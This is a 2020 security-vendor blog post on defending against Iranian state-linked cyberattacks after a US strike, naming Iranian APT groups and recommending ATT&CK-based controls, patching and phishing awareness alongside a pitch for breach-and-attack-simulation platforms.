January 8th, 2020
Itzik Kotler, CTO, SafeBreach
You can reduce your risks of attack and permanently improve your security stance by taking some common sense steps to prepare for the coming cyberthreats from Iran.
In the wake of a U.S. attack on January 2 that killed a top Iranian military official in Baghdad, government authorities are warning security and IT teams to brace for more attacks. A January 6, 2020 bulletin from CISA warned of higher likelihood of cyberattacks citing Iran’s history of “... Disruptive and destructive cyber operations against strategic targets, including finance, energy, and telecommunications organizations, and an increased interest in industrial control systems and operational technology.”
While generally less sophisticated than state-sponsored cyber-attack groups operating in Russia or China, Iran has developed a number of so-called Advanced Persistent Threat (APT) groups who have developed and undertaken a wide range of cyber attacks. These groups, such as APT33, APT34 (aka Oil Rig), APT35 (aka Magic Hound), APT39, CopyKitten and Muddy Water, have leveraged numerous techniques across all MITRE ATT&CK tactics for their attacks. Attack targets have ranged from key infrastructure in the energy industry (including physical system controls) to IT providers to government agencies and even pro-U.S. billionaires. In other words, everything and everyone is fair game.
In the wake of the U.S. attack, a handful of website defacement reports were attributed to Iranian cyber efforts but those are most likely to be “script-kiddie” attacks and not the efforts of the better organized and more sophisticated Iranian APT groups.
All of this said, let’s be honest. The attack changes very little for information security teams. Before this incident, state-sponsored Iranian hackers were consistently and persistently attacking U.S. targets. Perhaps they will redouble efforts but the threat has not changed all that much. With that in mind, now is a good a time as ever to ensure your endpoints, networks, infrastructure and software are all protected against an attack by Iran. Here are some key considerations.
Fortunately, modern platforms can automate and streamline many of the key processes required to defend against increased cyberattacks from Iran or any other online adversary. These platforms leverage the MITRE ATT&CK framework and other sources of searchable documented TTPs to constantly simulate attacks against your specific IT and security infrastructure. Breach-and-attack-simulation (BAS) platforms analyze not only where gaps in your security are located but also help you prioritize gaps to remediate based on business risk or other key criteria (presence of PII, critical infrastructure systems, etc). BAS platforms make managing complex IT topologies less risky by automating many of the key steps to test for security gaps and by providing remediation steps to close gaps quickly.
Over 100 TTPs have been associated with Iranian hacking groups by researchers contributing to the MITRE ATT&CK. For APT34 (aka OilRig), for example, MITRE lists dozens of techniques and tools across malware, Trojans, credential dumping, network scanners, and more. Search through the MITRE to identify the TTPs associated with the Iranian groups and make sure your security controls are in place to prevent against the specified TTPs. In reality, you should probably have controls in place against most of these TTPs anyway; they generally focus on known vectors and security gaps that every CISO and security team should be aware of.
Iranian hacking teams have consistently modified existing tools and exploit software slightly to evade detection. For example, the BONDUPDATER PowerShell Backdoor is a well known attack tool used by hacking groups linked to Iran. BONDUPDATER has been modified several times by OilRig. To guard against modified, CISOs and their teams should make sure to focus on the behavior part of TTPs and properly configure controls to account for all techniques; relying on signature detection and finding evidence of specific tools is not enough. Yes, this is basic security hygiene but imminent threats provide more impetus to take this extra step.
Often savvy APT groups seek unguarded pathways into organizations by looking for older systems and software that may be nearing end-of-life (EOL) or may no longer be supported with automatic patching by the OEMs and software suppliers. They know that these systems are often painful to maintain properly and may be under less scrutiny. In times of heightened security concerns, CISOs and their teams should carefully scan their security posture for these risks and make firm decisions to accelerate EOL or dedicated more resources to patching and monitoring.
With everything now fair game, its reasonable to expect that Iranian attack targets will expand and will focus on exacting more pain and causing more chaos for the U.S. and its allies. To date, attacks by Iran have focused more on gathering intelligence and infiltrating infrastructure. Some ransomware attacks have been attributed to Iran. But now, with damage and chaos prioritized, Iran’s APTs may elect to use more destructive attack types such as Wipers (which wipe clean databases and storage drives), Worms (which clog corporate networks and spread autonomously) and DDoS (Distributed Denial of Service). Low-hanging fruit might be; second tier financial institutions and exchanges, through which Iran may seek to disrupt finance markets; health care institutions, in which IT plays a critical role; and key U.S. infrastructure such as the power grid and utilities for water and gas. There are numerous single-points-of-failure in these systems which, when compromised, could impact millions of customers and users.
It’s a good time to re-educate your user base on the ABCs of social engineering attacks, like the spearfishing campaign that gave Russian hackers access to the Democratic National Committee’s email servers. These attacks are one of the known TTPs of Iran and they are a favored tactic for compromising senior targets high up in government and industry. A successful spearfishing attack against a prominent U.S. official, for example, might not only yield Iran useful intelligence and access but would also make for a major propaganda victory and an embarrassing situation for the United States.
Consider the Iran situation yet another dress rehearsal for the future of Cyberwar. In that future, cyberattackers will target numerous critical components of infrastructure seeking to do economic damage and potentially cause physical damage to the power grid, transportation networks or other crucial economic pillars. An increasing volume of attacks is an inevitable reality, considering the rising global tensions between so many of the cyber powerhouses. Preparing for that future proactively by modernizing your security stance with a Breach and Attack Simulation platform today will yield huge dividends down the road.